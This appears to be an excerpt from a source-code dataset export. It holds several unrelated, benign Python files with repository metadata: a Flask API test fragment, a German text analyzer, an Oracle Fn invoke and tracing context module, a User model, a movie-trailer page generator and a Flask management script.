data=params) data = json.loads(response.data) self.assertEqual(len(data['reviews']), 1) self.assertEqual(data['num_entries'], 5) self.assertEqual(data['reviews'][0]['review_response_id'], 7) def test_total_number_of_pages_greater_than_zero(self): self.seed_static_data() self.setup_reviewer_responses_finalverdict_reviewquestion_reviewresponses_and_scores() self.setup_two_extra_responses_for_reviewer3() params ={'event_id' : 1, 'page_number' : 2, 'limit' : 2, 'sort_column' : 'review_response_id'} header = self.get_auth_header_for('r3@r.com') response = self.app.get('/api/v1/reviewhistory', headers=header, data=params) data = json.loads(response.data) self.assertEqual(data['total_pages'], 3) def test_total_number_of_pages_when_zero(self): self.seed_static_data() self.setup_reviewer_with_no_reviewresponses() params ={'event_id' : 1, 'page_number' : 2, 'limit' : 2, 'sort_column' : 'review_response_id'} header = self.get_auth_header_for('r1@r.com') response = self.app.get('/api/v1/reviewhistory', headers=header, data=params) data = json.loads(response.data) self.assertEqual(data['total_pages'], 0)
50,461
2,172
24
fccd3577beac65370c5b11906b2378b151aeac75
10,050
py
Python
TextAnalyzer.py
GoetzEdinger/TextAnalyzer
ca305163fce52ade2edd20d80902911fc022f175
[ "MIT" ]
1
2015-07-12T21:31:27.000Z
2015-07-12T21:31:27.000Z
TextAnalyzer.py
GoetzEdinger/TextAnalyzer
ca305163fce52ade2edd20d80902911fc022f175
[ "MIT" ]
null
null
null
TextAnalyzer.py
GoetzEdinger/TextAnalyzer
ca305163fce52ade2edd20d80902911fc022f175
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- ''' Created on 09.07.2015 @author: Goetz Edinger ''' import enchant import nltk.data from nltk.tokenize import sent_tokenize from nltk.tokenize import word_tokenize import string import sys debug = True dict_sentence_length = {} dict_word_length = {} number_of_letters = 0 number_of_words = 0 number_of_sentences = 0 average_length_word = 0 number_of_foreign_words = 0 average_length_sentence = 0 length_shortest_word = 10000 length_longest_word = 0 length_of_all_words = 0 length_shortest_sentence = 10000 length_longest_sentence = 0 length_of_all_sentences = 0 number_of_words_long_sentence = 0 shortest_word = "" longest_word = "" ######################################################## # # Split Text into words # Count the letters of every word # Count how many words have how many letters # ######################################################## ######################################################## # # Split Text into sentences # Count the words of every sentence # Count how many sentences have how many words # ######################################################## ######################################################## # # Count foreign words # ######################################################## ######################################################## # # Display results # ######################################################## ######################################################## # # Statistics: # # Thresholds: # # for words: # green == good () # yellow == acceptable () # red == not acceptable () # # for sentences: # green == good () # yellow == acceptable () # red == not acceptable () # # Calculate the average length of the words # Calculate the average length of the sentences # ######################################################## if __name__ == '__main__': main(sys.argv[1:])
36.948529
931
0.644279
# -*- coding: utf-8 -*- ''' Created on 09.07.2015 @author: Goetz Edinger ''' import enchant import nltk.data from nltk.tokenize import sent_tokenize from nltk.tokenize import word_tokenize import string import sys debug = True dict_sentence_length = {} dict_word_length = {} number_of_letters = 0 number_of_words = 0 number_of_sentences = 0 average_length_word = 0 number_of_foreign_words = 0 average_length_sentence = 0 length_shortest_word = 10000 length_longest_word = 0 length_of_all_words = 0 length_shortest_sentence = 10000 length_longest_sentence = 0 length_of_all_sentences = 0 number_of_words_long_sentence = 0 shortest_word = "" longest_word = "" def count_letters(text): global number_of_letters number_of_letters = len(text) ######################################################## # # Split Text into words # Count the letters of every word # Count how many words have how many letters # ######################################################## def tokenize_words(text): global number_of_words global dict_word_length global length_of_all_words global length_longest_word global length_shortest_word global shortest_word global longest_word word_tokenize_list = word_tokenize(text) count_foreign_words(word_tokenize_list) number_of_words = len(word_tokenize_list) for word in word_tokenize_list: if word in [",", ".", ":", ";", "!", "?"]: number_of_words -= 1 for word in word_tokenize_list: if word not in [",", ".", ":", ";", "!", "?"]: # Get the length of the word word_length = len(word) # Get the longest word if word_length > length_longest_word: length_longest_word = word_length longest_word = word # Get the shortest word if word_length < length_shortest_word: length_shortest_word = word_length shortest_word = word # Add word_length to length_of_all_words which is a variable to compute the average_length_word length_of_all_words += word_length # Look up in the Dictionary dict_word_length, if there is already a key with the same length. if dict_word_length.has_key(word_length): # If yes, then get the value of that key ... old_key = dict_word_length.get(word_length) # ... increase the value ... new_key = old_key + 1 # ... write the key/value pair to the Dictionary dict_word_length dict_word_length[word_length] = new_key else: # ... add new key (word_length) with value 1 dict_word_length[word_length] = 1 ######################################################## # # Split Text into sentences # Count the words of every sentence # Count how many sentences have how many words # ######################################################## def tokenize_sentences(text): global length_longest_sentence global length_shortest_sentence global dict_sentence_length global number_of_sentences global length_of_all_sentences german_tokenizer = nltk.data.load('tokenizers/punkt/german.pickle') sent_tokenize_list = german_tokenizer.tokenize(text) number_of_sentences = len(sent_tokenize_list) if debug: print "\nSätze\n" for sentence in sent_tokenize_list: if debug: print sentence # Get the length of the sentence sentence_length = len(sentence) # Add sentence_length to length_of_all_sentences which is a variable to compute the average_length_sentence length_of_all_sentences += sentence_length # Get the longest sentence if sentence_length > length_longest_sentence: length_longest_sentence = sentence_length # Get the shortest sentence if sentence_length < length_shortest_sentence: length_shortest_sentence = sentence_length # Look up in the Dictionary dict_sentence_length, if there is already a key with the same length. if dict_sentence_length.has_key(sentence_length): # If yes, then get the value of that key ... old_key = dict_sentence_length.get(sentence_length) # ... increase the value ... new_key = old_key + 1 # ... write the key/value pair to the Dictionary dict_sentence_length dict_sentence_length[sentence_length] = new_key else: # ... add new key (sentence_length) with value 1 dict_sentence_length[sentence_length] = 1 ######################################################## # # Count foreign words # ######################################################## def count_foreign_words(word_list): global number_of_foreign_words d = enchant.Dict("de_DE") if debug: print "Fremdwörter\n" for word in word_list: if not d.check(word): if word not in [",", ".", ":", ";", "!", "?"]: number_of_foreign_words += 1 if debug: print word ######################################################## # # Display results # ######################################################## def display_results(): global number_of_letters global number_of_words global number_of_sentences global average_length_word global number_of_foreign_words global average_length_sentence global length_shortest_word global length_longest_word global length_shortest_sentence global length_longest_sentence global shortest_word global longest_word if debug: print "Number of letters : " + str(number_of_letters) print "Number of words : " + str(number_of_words) print "Number of sentences : " + str(number_of_sentences) print "Average length of words : " + str(average_length_word) print "Number of foreign words : " + str(number_of_foreign_words) print "Average length of sentences : " + str(average_length_sentence) print "Length of the shortest word : " + str(length_shortest_word) print "Shortest word : " + shortest_word print "Length of the longest word : " + str(length_longest_word) print "Longest word : " + longest_word print "Length of the shortest sentence: " + str(length_shortest_sentence) print "Length of the longest sentence : " + str(length_longest_sentence) ######################################################## # # Statistics: # # Thresholds: # # for words: # green == good () # yellow == acceptable () # red == not acceptable () # # for sentences: # green == good () # yellow == acceptable () # red == not acceptable () # # Calculate the average length of the words # Calculate the average length of the sentences # ######################################################## def statistics(): global length_of_all_words global number_of_words global average_length_word global length_of_all_sentences global number_of_sentences global average_length_sentence # Calculate the average length of the words average_length_word = length_of_all_words/number_of_words # Calculate the average length of the sentences average_length_sentence = length_of_all_sentences/number_of_sentences def get_text_from_file(filename): text = "" try: file = open(filename, 'r') text = file.read() return text except: return text def main(argv): text = """Raum- und Zeitangaben sind in der Relativitätstheorie keine universell gültigen Ordnungsstrukturen. Vielmehr werden der räumliche und zeitliche Abstand zweier Ereignisse oder auch deren Gleichzeitigkeit von Beobachtern mit verschiedenen Bewegungszuständen unterschiedlich beurteilt. Bewegte Objekte erweisen sich im Vergleich zum Ruhezustand in Bewegungsrichtung als verkürzt und bewegte Uhren als verlangsamt. Da jedoch jeder gleichförmig bewegte Beobachter den Standpunkt vertreten kann, er sei in Ruhe, beruhen diese Beobachtungen auf Gegenseitigkeit, das heißt, zwei relativ zueinander bewegte Beobachter sehen die Uhren des jeweils anderen langsamer gehen. Außerdem sind aus ihrer Sicht die Meterstäbe des jeweils anderen kürzer als ein Meter, wenn sie längs der Bewegungsrichtung ausgerichtet sind. Die Frage, wer die Situation korrekt beschreibt, ist hierbei prinzipiell nicht zu beantworten und daher sinnlos. Diese Längenkontraktion und Zeitdilatation lassen sich vergleichsweise anschaulich anhand von Minkowski-Diagrammen und anhand des bekannten Zwillingsparadoxons nachvollziehen. In der mathematischen Formulierung ergeben sie sich aus der Lorentz-Transformation, die den Zusammenhang zwischen den Raum- und Zeitkoordinaten der verschiedenen Beobachter beschreibt. Diese Transformation lässt sich direkt aus den beiden obigen Axiomen und der Annahme, dass sie linear ist, herleiten. Die meisten dieser relativistisch erklärbaren Phänomene machen sich erst bei Geschwindigkeiten bemerkbar, die im Vergleich zur Lichtgeschwindigkeit nennenswert groß sind. Solche Geschwindigkeiten werden im Alltag nicht annähernd erreicht. John Smith ist ein Märchenerzähler. Der 1. Mai ist ein Feiertag. Hol's der Kuckuck!""" if len(argv) > 0: text = get_text_from_file(argv[0]) if len(argv) > 1: print "usage: python TextAnalyzer" print "or" print "python TextAnalyzer <filename>" else: if len(text) > 2: count_letters(text) tokenize_words(text) tokenize_sentences(text) statistics() display_results() else: print "Something went wrong ..." if __name__ == '__main__': main(sys.argv[1:])
7,907
0
184
6dcb4bfbb7a76895bfedb5f55a7a7983bbd60f32
11,375
py
Python
fdk/context.py
jlowe000/fdk-python
d7b96bcb974733792cc29d0afd3d86b3f120ac54
[ "ECL-2.0", "Apache-2.0" ]
44
2017-11-03T14:59:07.000Z
2022-01-17T18:58:07.000Z
fdk/context.py
jlowe000/fdk-python
d7b96bcb974733792cc29d0afd3d86b3f120ac54
[ "ECL-2.0", "Apache-2.0" ]
66
2017-11-28T16:01:55.000Z
2021-07-28T11:20:13.000Z
fdk/context.py
jlowe000/fdk-python
d7b96bcb974733792cc29d0afd3d86b3f120ac54
[ "ECL-2.0", "Apache-2.0" ]
16
2017-12-08T15:58:43.000Z
2022-01-28T16:08:36.000Z
# # Copyright (c) 2019, 2020 Oracle and/or its affiliates. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import datetime as dt import io import os import random from fdk import constants from fdk import headers as hs from fdk import log from collections import namedtuple def context_from_format(format_def: str, **kwargs) -> ( InvokeContext, io.BytesIO): """ Creates a context from request :param format_def: function format :type format_def: str :param kwargs: request-specific map of parameters :return: invoke context and data :rtype: tuple """ app_id = os.environ.get(constants.FN_APP_ID) fn_id = os.environ.get(constants.FN_ID) app_name = os.environ.get(constants.FN_APP_NAME) fn_name = os.environ.get(constants.FN_NAME) # the tracing enabled env variable is passed as a "0" or "1" string # and therefore needs to be converted appropriately. is_tracing_enabled = os.environ.get(constants.OCI_TRACING_ENABLED) is_tracing_enabled = ( bool(int(is_tracing_enabled)) if is_tracing_enabled is not None else False ) trace_collector_url = os.environ.get(constants.OCI_TRACE_COLLECTOR_URL) if format_def == constants.HTTPSTREAM: data = kwargs.get("data") headers = kwargs.get("headers") # zipkin tracing http headers trace_id = span_id = parent_span_id = is_sampled = trace_flags = None tracing_context = None if is_tracing_enabled: # we generate the trace_id if tracing is enabled # but the traceId zipkin header is missing. trace_id = headers.get(constants.X_B3_TRACEID) trace_id = generate_id() if trace_id is None else trace_id span_id = headers.get(constants.X_B3_SPANID) parent_span_id = headers.get(constants.X_B3_PARENTSPANID) # span_id is also generated if the zipkin header is missing. span_id = generate_id() if span_id is None else span_id # is_sampled should be a boolean in the form of a "0/1" but # legacy samples have them as "False/True" is_sampled = headers.get(constants.X_B3_SAMPLED) is_sampled = int(is_sampled) if is_sampled is not None else 1 # not currently used but is defined by the zipkin headers standard trace_flags = headers.get(constants.X_B3_FLAGS) # tracing context will be an empty object # if tracing is not enabled or the flag is missing. # this prevents the customer code from failing if they decide to # disable tracing. An empty tracing context will not # emit spans due to is_sampled being None. tracing_context = TracingContext( is_tracing_enabled, trace_collector_url, trace_id, span_id, parent_span_id, is_sampled, trace_flags ) method = headers.get(constants.FN_HTTP_METHOD) request_url = headers.get(constants.FN_HTTP_REQUEST_URL) deadline = headers.get(constants.FN_DEADLINE) call_id = headers.get(constants.FN_CALL_ID) content_type = headers.get(constants.CONTENT_TYPE) ctx = InvokeContext( app_id, app_name, fn_id, fn_name, call_id, content_type=content_type, deadline=deadline, config=os.environ, headers=headers, method=method, request_url=request_url, fn_format=constants.HTTPSTREAM, tracing_context=tracing_context, ) return ctx, data
32.78098
78
0.63833
# # Copyright (c) 2019, 2020 Oracle and/or its affiliates. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import datetime as dt import io import os import random from fdk import constants from fdk import headers as hs from fdk import log from collections import namedtuple class InvokeContext(object): def __init__(self, app_id, app_name, fn_id, fn_name, call_id, content_type="application/octet-stream", deadline=None, config=None, headers=None, request_url=None, method="POST", fn_format=None, tracing_context=None): """ Request context here to be a placeholder for request-specific attributes :param app_id: Fn App ID :type app_id: str :param app_name: Fn App name :type app_name: str :param fn_id: Fn App Fn ID :type fn_id: str :param fn_name: Fn name :type fn_name: str :param call_id: Fn call ID :type call_id: str :param content_type: request content type :type content_type: str :param deadline: request deadline :type deadline: str :param config: an app/fn config :type config: dict :param headers: request headers :type headers: dict :param request_url: request URL :type request_url: str :param method: request method :type method: str :param fn_format: function format :type fn_format: str :param tracing_context: tracing context :type tracing_context: TracingContext """ self.__app_id = app_id self.__fn_id = fn_id self.__call_id = call_id self.__config = config if config else {} self.__headers = headers if headers else {} self.__http_headers = {} self.__deadline = deadline self.__content_type = content_type self._request_url = request_url self._method = method self.__response_headers = {} self.__fn_format = fn_format self.__app_name = app_name self.__fn_name = fn_name self.__tracing_context = tracing_context if tracing_context else None log.log("request headers. gateway: {0} {1}" .format(self.__is_gateway(), headers)) if self.__is_gateway(): self.__headers = hs.decap_headers(headers, True) self.__http_headers = hs.decap_headers(headers, False) def AppID(self): return self.__app_id def AppName(self): return self.__app_name def FnID(self): return self.__fn_id def FnName(self): return self.__fn_name def CallID(self): return self.__call_id def Config(self): return self.__config def Headers(self): return self.__headers def HTTPHeaders(self): return self.__http_headers def Format(self): return self.__fn_format def TracingContext(self): return self.__tracing_context def Deadline(self): if self.__deadline is None: now = dt.datetime.now(dt.timezone.utc).astimezone() now += dt.timedelta(0, float(constants.DEFAULT_DEADLINE)) return now.isoformat() return self.__deadline def SetResponseHeaders(self, headers, status_code): log.log("setting headers. gateway: {0}".format(self.__is_gateway())) if self.__is_gateway(): headers = hs.encap_headers(headers, status=status_code) for k, v in headers.items(): self.__response_headers[k.lower()] = v def GetResponseHeaders(self): return self.__response_headers def RequestURL(self): return self._request_url def Method(self): return self._method def __is_gateway(self): return (constants.FN_INTENT in self.__headers and self.__headers.get(constants.FN_INTENT) == constants.INTENT_HTTP_REQUEST) class TracingContext(object): def __init__(self, is_tracing_enabled, trace_collector_url, trace_id, span_id, parent_span_id, is_sampled, flags): """ Tracing context here to be a placeholder for tracing-specific attributes :param is_tracing_enabled: tracing enabled flag :type is_tracing_enabled: bool :param trace_collector_url: APM Trace Collector Endpoint URL :type trace_collector_url: str :param trace_id: Trace ID :type trace_id: str :param span_id: Span ID :type span_id: str :param parent_span_id: Parent Span ID :type parent_span_id: str :param is_sampled: Boolean for emmitting spans :type is_sampled: int (0 or 1) :param flags: Debug flags :type flags: int (0 or 1) """ self.__is_tracing_enabled = is_tracing_enabled self.__trace_collector_url = trace_collector_url self.__trace_id = trace_id self.__span_id = span_id self.__parent_span_id = parent_span_id self.__is_sampled = is_sampled self.__flags = flags self.__app_name = os.environ.get(constants.FN_APP_NAME) self.__app_id = os.environ.get(constants.FN_APP_ID) self.__fn_name = os.environ.get(constants.FN_NAME) self.__fn_id = os.environ.get(constants.FN_ID) self.__zipkin_attrs = self.__create_zipkin_attrs(is_tracing_enabled) def is_tracing_enabled(self): return self.__is_tracing_enabled def trace_collector_url(self): return self.__trace_collector_url def trace_id(self): return self.__trace_id def span_id(self): return self.__span_id def parent_span_id(self): return self.__parent_span_id def is_sampled(self): return bool(self.__is_sampled) def flags(self): return self.__flags def zipkin_attrs(self): return self.__zipkin_attrs # this is a helper method specific for py_zipkin def __create_zipkin_attrs(self, is_tracing_enabled): ZipkinAttrs = namedtuple( "ZipkinAttrs", "trace_id, span_id, parent_span_id, is_sampled, flags" ) trace_id = self.__trace_id span_id = self.__span_id parent_span_id = self.__parent_span_id is_sampled = bool(self.__is_sampled) trace_flags = self.__flags # As the fnLb sends the parent_span_id as the span_id # assign the parent span id as the span id. if is_tracing_enabled: parent_span_id = span_id span_id = generate_id() zipkin_attrs = ZipkinAttrs( trace_id, span_id, parent_span_id, is_sampled, trace_flags ) return zipkin_attrs def service_name(self, override=None): # in case of missing app and function name env variables service_name = ( override if override is not None else str(self.__app_name) + "::" + str(self.__fn_name) ) return service_name.lower() def annotations(self): annotations = { "generatedBy": "faas", "appName": self.__app_name, "appID": self.__app_id, "fnName": self.__fn_name, "fnID": self.__fn_id, } return annotations def generate_id(): return "{:016x}".format(random.getrandbits(64)) def context_from_format(format_def: str, **kwargs) -> ( InvokeContext, io.BytesIO): """ Creates a context from request :param format_def: function format :type format_def: str :param kwargs: request-specific map of parameters :return: invoke context and data :rtype: tuple """ app_id = os.environ.get(constants.FN_APP_ID) fn_id = os.environ.get(constants.FN_ID) app_name = os.environ.get(constants.FN_APP_NAME) fn_name = os.environ.get(constants.FN_NAME) # the tracing enabled env variable is passed as a "0" or "1" string # and therefore needs to be converted appropriately. is_tracing_enabled = os.environ.get(constants.OCI_TRACING_ENABLED) is_tracing_enabled = ( bool(int(is_tracing_enabled)) if is_tracing_enabled is not None else False ) trace_collector_url = os.environ.get(constants.OCI_TRACE_COLLECTOR_URL) if format_def == constants.HTTPSTREAM: data = kwargs.get("data") headers = kwargs.get("headers") # zipkin tracing http headers trace_id = span_id = parent_span_id = is_sampled = trace_flags = None tracing_context = None if is_tracing_enabled: # we generate the trace_id if tracing is enabled # but the traceId zipkin header is missing. trace_id = headers.get(constants.X_B3_TRACEID) trace_id = generate_id() if trace_id is None else trace_id span_id = headers.get(constants.X_B3_SPANID) parent_span_id = headers.get(constants.X_B3_PARENTSPANID) # span_id is also generated if the zipkin header is missing. span_id = generate_id() if span_id is None else span_id # is_sampled should be a boolean in the form of a "0/1" but # legacy samples have them as "False/True" is_sampled = headers.get(constants.X_B3_SAMPLED) is_sampled = int(is_sampled) if is_sampled is not None else 1 # not currently used but is defined by the zipkin headers standard trace_flags = headers.get(constants.X_B3_FLAGS) # tracing context will be an empty object # if tracing is not enabled or the flag is missing. # this prevents the customer code from failing if they decide to # disable tracing. An empty tracing context will not # emit spans due to is_sampled being None. tracing_context = TracingContext( is_tracing_enabled, trace_collector_url, trace_id, span_id, parent_span_id, is_sampled, trace_flags ) method = headers.get(constants.FN_HTTP_METHOD) request_url = headers.get(constants.FN_HTTP_REQUEST_URL) deadline = headers.get(constants.FN_DEADLINE) call_id = headers.get(constants.FN_CALL_ID) content_type = headers.get(constants.CONTENT_TYPE) ctx = InvokeContext( app_id, app_name, fn_id, fn_name, call_id, content_type=content_type, deadline=deadline, config=os.environ, headers=headers, method=method, request_url=request_url, fn_format=constants.HTTPSTREAM, tracing_context=tracing_context, ) return ctx, data
2,729
4,417
69
e8b50469be455015225ee1e1a7a899709b2a0f60
1,622
py
Python
models/user.py
CodeByMini/thefriendzone
84c3dd14ba2b0be7cf3cd681f761d3d6780498d4
[ "Apache-2.0" ]
null
null
null
models/user.py
CodeByMini/thefriendzone
84c3dd14ba2b0be7cf3cd681f761d3d6780498d4
[ "Apache-2.0" ]
null
null
null
models/user.py
CodeByMini/thefriendzone
84c3dd14ba2b0be7cf3cd681f761d3d6780498d4
[ "Apache-2.0" ]
null
null
null
from models.status import Status from datetime import datetime class User: """ The User object represents a person, bot or entity registered as a user in the application. username: (str) password: (str) last_seen: (str) timestamp when the user was latest recorded as active. Mutates with update_last_seen(). buddies: (dict <str, User>) status: (Status enum) """ @property @username.setter @property @password.setter @property @property
22.84507
71
0.600493
from models.status import Status from datetime import datetime class User: """ The User object represents a person, bot or entity registered as a user in the application. username: (str) password: (str) last_seen: (str) timestamp when the user was latest recorded as active. Mutates with update_last_seen(). buddies: (dict <str, User>) status: (Status enum) """ def __init__(self, username, password): self._username = username self._password = password self._last_seen = None self._buddies = dict() self._status = Status.offline def __repr__(self): return f"User(username: {self._username}" def __str__(self): return f"{self._username}, last seen: {self._last_seen}" @property def username(self): return self._username @username.setter def username(self, val): self._username = val @property def password(self): return self._password @password.setter def password(self, val): self._password = val @property def buddies(self): return self._buddies @property def last_seen(self): return self._last_seen def update_last_seen(self): self._last_seen = datetime.now().strftime("%m/%d/%Y, %H:%M:%S") def add_buddy(self, buddy): self._buddies['buddies'] = buddy def remove_buddy(self, username) -> bool: try: del self._buddies[username] except KeyError: return False return True
740
0
317
ebc9c14fe5a89e7e13d7881bbe679c8d68478cf4
1,972
py
Python
entertainmentCenter.py
Arie3301/udacity-movietrailers
b23b1981ba71fd1535e7a77aa4332413586ac56e
[ "MIT" ]
null
null
null
entertainmentCenter.py
Arie3301/udacity-movietrailers
b23b1981ba71fd1535e7a77aa4332413586ac56e
[ "MIT" ]
null
null
null
entertainmentCenter.py
Arie3301/udacity-movietrailers
b23b1981ba71fd1535e7a77aa4332413586ac56e
[ "MIT" ]
null
null
null
import media import fresh_tomatoes def main(): """Generate an HTML page to show movies with corresponding information.""" toy_story = media.Movie( "Toy Story", "A story of a boy and his toys that come to life.", "https://upload.wikimedia.org/wikipedia/en/1/13/Toy_Story.jpg", "https://www.youtube.com/watch?v=KYz2wyBy3kc" ) forrest_gump = media.Movie( "Forrest Gump", "A story of an imbecile who makes history.", "https://upload.wikimedia.org/wikipedia/en/6/67/Forrest_Gump_poster.jpg", # NOQA "https://www.youtube.com/watch?v=77ij5gCTjYU" ) goodfellas = media.Movie( "Goodfellas", "The rise and fall of a gangster.", "https://upload.wikimedia.org/wikipedia/en/7/7b/Goodfellas.jpg", "https://www.youtube.com/watch?v=qo5jJpHtI1Y" ) lion_king = media.Movie( "The Lion King", "Hamlet on the Savanah.", "https://upload.wikimedia.org/wikipedia/en/3/3d/The_Lion_King_poster.jpg", # NOQA "https://www.youtube.com/watch?v=4sj1MT05lAA" ) hercules = media.Movie( "Hercules", "The son of Zeus must earn his place back among the gods.", "https://upload.wikimedia.org/wikipedia/en/6/65/Hercules_%281997_film%29_poster.jpg", # NOQA "https://www.youtube.com/watch?v=ZvtspevZxpg" ) oceans_11 = media.Movie( "Ocean's Eleven", "A gang of eleven makes a casino heist.", "https://upload.wikimedia.org/wikipedia/en/6/68/Ocean%27s_Eleven_2001_Poster.jpg", # NOQA "https://www.youtube.com/watch?v=imm6OR605UI" ) # fresh_tomatoes.open_movies_page() requires its argument in list format movies = [ toy_story, forrest_gump, goodfellas, lion_king, hercules, oceans_11 ] fresh_tomatoes.open_movies_page(movies) if __name__ == "__main__": main()
30.8125
101
0.619168
import media import fresh_tomatoes def main(): """Generate an HTML page to show movies with corresponding information.""" toy_story = media.Movie( "Toy Story", "A story of a boy and his toys that come to life.", "https://upload.wikimedia.org/wikipedia/en/1/13/Toy_Story.jpg", "https://www.youtube.com/watch?v=KYz2wyBy3kc" ) forrest_gump = media.Movie( "Forrest Gump", "A story of an imbecile who makes history.", "https://upload.wikimedia.org/wikipedia/en/6/67/Forrest_Gump_poster.jpg", # NOQA "https://www.youtube.com/watch?v=77ij5gCTjYU" ) goodfellas = media.Movie( "Goodfellas", "The rise and fall of a gangster.", "https://upload.wikimedia.org/wikipedia/en/7/7b/Goodfellas.jpg", "https://www.youtube.com/watch?v=qo5jJpHtI1Y" ) lion_king = media.Movie( "The Lion King", "Hamlet on the Savanah.", "https://upload.wikimedia.org/wikipedia/en/3/3d/The_Lion_King_poster.jpg", # NOQA "https://www.youtube.com/watch?v=4sj1MT05lAA" ) hercules = media.Movie( "Hercules", "The son of Zeus must earn his place back among the gods.", "https://upload.wikimedia.org/wikipedia/en/6/65/Hercules_%281997_film%29_poster.jpg", # NOQA "https://www.youtube.com/watch?v=ZvtspevZxpg" ) oceans_11 = media.Movie( "Ocean's Eleven", "A gang of eleven makes a casino heist.", "https://upload.wikimedia.org/wikipedia/en/6/68/Ocean%27s_Eleven_2001_Poster.jpg", # NOQA "https://www.youtube.com/watch?v=imm6OR605UI" ) # fresh_tomatoes.open_movies_page() requires its argument in list format movies = [ toy_story, forrest_gump, goodfellas, lion_king, hercules, oceans_11 ] fresh_tomatoes.open_movies_page(movies) if __name__ == "__main__": main()
0
0
0
a4ae68cc8e486e00feeb0701d05b2910a94a4ebd
4,624
py
Python
manage.py
alessiosavi/PyParser
788f783bd17ab5d63cec62af6d54b94f2b1737c9
[ "Apache-2.0" ]
null
null
null
manage.py
alessiosavi/PyParser
788f783bd17ab5d63cec62af6d54b94f2b1737c9
[ "Apache-2.0" ]
null
null
null
manage.py
alessiosavi/PyParser
788f783bd17ab5d63cec62af6d54b94f2b1737c9
[ "Apache-2.0" ]
null
null
null
# -*- coding: utf-8 -*- import argparse import os import signal import subprocess import sys # Project defaults from utils import utils # ===== LOAD CONFIGURATION FILE ===== CONFIG_FILE = "conf/conf.json" CFG, log, = utils.init_main_data(CONFIG_FILE) if CFG is None or log is None: print("Unable to load {}".format(CONFIG_FILE)) sys.exit(2) DEFAULT_IP = "{}:{}".format(CFG['network']['host'], CFG['network']["port"]) FLASK_APP = 'server/__init__.py' cm = CommandManager() cm.add(Command( "build", "compiles python files in project into .pyc binaries", lambda c: 'python -m compileall .')) cm.add(Command( "start", "runs server with gunicorn in a production setting", lambda c: 'gunicorn -b {0}:{1} --timeout 99999 server:app'.format(c['host'], c['port']), { 'FLASK_APP': FLASK_APP, 'FLASK_DEBUG': 'false' })) cm.add(Command( "run", "runs dev server using Flask's native debugger & backend reloader", lambda c: 'python -m flask run --host={0} --port={1} --debugger --reload'.format(c['host'], c['port']), { 'FLASK_APP': FLASK_APP, 'FLASK_DEBUG': 'true' })) cm.add(Command( "livereload", "runs dev server using livereload for dynamic webpage reloading", lambda c: 'python -m flask run', { 'FLASK_APP': FLASK_APP, 'FLASK_LIVE_RELOAD': 'true', })) cm.add(Command( "debug", "runs dev server in debug mode; use with an IDE's remote debugger", lambda c: 'python -m flask run --host={0} --port={1} --no-debugger --no-reload'.format(c['host'], c['port']), { 'FLASK_APP': FLASK_APP, 'FLASK_DEBUG': 'true' })) cm.add(Command( "test", "runs all tests inside of `tests` directory", lambda c: 'python -m unittest discover -s tests -p "*.py"')) # Create and format argument parser for CLI parser = argparse.ArgumentParser(description=cm.availableCommands(), formatter_class=argparse.RawDescriptionHelpFormatter) parser.add_argument("subcommand", help="subcommand to run (see list above)") parser.add_argument("ipaddress", nargs='?', default=DEFAULT_IP, help="address and port to run on (i.e. {0})".format(DEFAULT_IP)) # Take in command line input for configuration try: args = parser.parse_args() cmd = args.subcommand addr = args.ipaddress.split(':') cm.configure({ 'host': addr[0], 'port': addr[1], }) cm.run(cmd) except KeyboardInterrupt: if 'FLASK_LIVE_RELOAD' in os.environ and os.environ['FLASK_LIVE_RELOAD'] == 'true': livereload_check() except: if len(sys.argv) == 1: log.debug(cm.availableCommands()) sys.exit(0)
29.832258
113
0.601644
# -*- coding: utf-8 -*- import argparse import os import signal import subprocess import sys # Project defaults from utils import utils # ===== LOAD CONFIGURATION FILE ===== CONFIG_FILE = "conf/conf.json" CFG, log, = utils.init_main_data(CONFIG_FILE) if CFG is None or log is None: print("Unable to load {}".format(CONFIG_FILE)) sys.exit(2) DEFAULT_IP = "{}:{}".format(CFG['network']['host'], CFG['network']["port"]) FLASK_APP = 'server/__init__.py' class Command: def __init__(self, name, descr, runcmd, env=None, conf=None): if conf is None: conf = {} if env is None: env = {} self.name = name self.descr = descr self.runcmd = runcmd self.env = env self.conf = conf def run(self, conf): cmd = self.runcmd(conf) env = os.environ env.update(conf) env.update(self.env) subprocess.call(cmd, env=env, shell=True) class CommandManager: def __init__(self): self.commands = {} def add(self, command): self.commands[command.name] = command def configure(self, conf): self.conf = conf def run(self, command): if command in self.commands: self.commands[command].run(self.conf) else: log.debug("invalid command specified\n") log.debug(self.availableCommands()) def availableCommands(self): commands = sorted(self.commands.values(), key=lambda c: c.name) space = max([len(c.name) for c in commands]) + 2 description = 'available subcommands:\n' for c in commands: description += ' ' + c.name + ' ' * (space - len(c.name)) + c.descr + '\n' return description cm = CommandManager() cm.add(Command( "build", "compiles python files in project into .pyc binaries", lambda c: 'python -m compileall .')) cm.add(Command( "start", "runs server with gunicorn in a production setting", lambda c: 'gunicorn -b {0}:{1} --timeout 99999 server:app'.format(c['host'], c['port']), { 'FLASK_APP': FLASK_APP, 'FLASK_DEBUG': 'false' })) cm.add(Command( "run", "runs dev server using Flask's native debugger & backend reloader", lambda c: 'python -m flask run --host={0} --port={1} --debugger --reload'.format(c['host'], c['port']), { 'FLASK_APP': FLASK_APP, 'FLASK_DEBUG': 'true' })) cm.add(Command( "livereload", "runs dev server using livereload for dynamic webpage reloading", lambda c: 'python -m flask run', { 'FLASK_APP': FLASK_APP, 'FLASK_LIVE_RELOAD': 'true', })) cm.add(Command( "debug", "runs dev server in debug mode; use with an IDE's remote debugger", lambda c: 'python -m flask run --host={0} --port={1} --no-debugger --no-reload'.format(c['host'], c['port']), { 'FLASK_APP': FLASK_APP, 'FLASK_DEBUG': 'true' })) cm.add(Command( "test", "runs all tests inside of `tests` directory", lambda c: 'python -m unittest discover -s tests -p "*.py"')) # Create and format argument parser for CLI parser = 